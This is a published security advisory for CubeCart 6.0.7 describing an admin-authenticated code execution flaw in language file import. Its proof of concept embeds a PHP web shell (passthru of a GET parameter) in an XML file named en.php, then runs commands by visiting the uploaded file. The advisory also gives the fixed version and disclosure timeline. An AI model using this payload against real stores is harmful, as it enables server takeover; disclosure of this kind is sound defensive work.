CubeCart 6.0.7 Code Execution

2015-11-07T00:00:00
ID PACKETSTORM:134259
Type packetstorm
Reporter Tim Coen
Modified 2015-11-07T00:00:00

Description

                                        
                                            `Security Advisory - Curesec Research Team  
  
1. Introduction  
  
Affected Product: CubeCart 6.0.7  
Fixed in: 6.0.8  
Fixed Version Link: https://www.cubecart.com/thank-you/CubeCart-6.0.8.zip  
Vendor Contact: sales@cubecart.com  
Vulnerability Type: Code Execution  
Remote Exploitable: Yes  
Reported to vendor: 09/07/2015  
Disclosed to public: 10/07/2015  
Release mode: Coordinated release  
CVE: n/a  
Credits Tim Coen of Curesec GmbH  
  
2. Vulnerability Description  
  
When importing a language from a language file, it is only checked that the  
file contains valid XML, but the original extension of the file is kept, which  
makes it possible to gain code execution by uploading a file containing PHP  
code.  
  
Please note that admin credentials are required.  
  
3. Proof of Concept  
  
Create a language file with valid XML and a file name like en.php with PHP code  
inside:  
  
  
<language version="2.0">  
<info>  
<title>  
<![CDATA[My Language (UK)]]>  
</title>  
<code>My <?php passthru($_GET['x']);?>Language</code>  
<character_set>utf-8</character_set>  
<version>1.0.0</version>  
<minVersion>5.0.0a</minVersion>  
<maxVersion>5.1.*</maxVersion>  
<default_currency>GBP</default_currency>  
<text-direction>ltr</text-direction>  
<override/>  
</info>  
<translation>  
<group name="address">  
<string name="state">  
<![CDATA[County]]></string>  
</group>  
</translation>  
</language>  
  
Upload the file here: http://localhost/ecommerce/CubeCart-6.0.6/admin.php?_g=  
settings&node=language#lang_import  
  
And visit it to execute the code: http://localhost/ecommerce/CubeCart-6.0.6/  
language/en.php?x=ls%20-alF  
  
4. Solution  
  
To mitigate this issue please upgrade at least to version 6.0.8:  
  
https://www.cubecart.com/thank-you/CubeCart-6.0.8.zip  
  
Please note that a newer version might already be available.  
  
5. Report Timeline  
  
09/07/2015 Informed Vendor about Issue  
10/05/2015 Vendor releases fix  
10/07/2015 Disclosed to public  
  
  
Blog Reference:  
http://blog.curesec.com/article/blog/CubeCart-607-Code-Execution-70.html  
  
  
`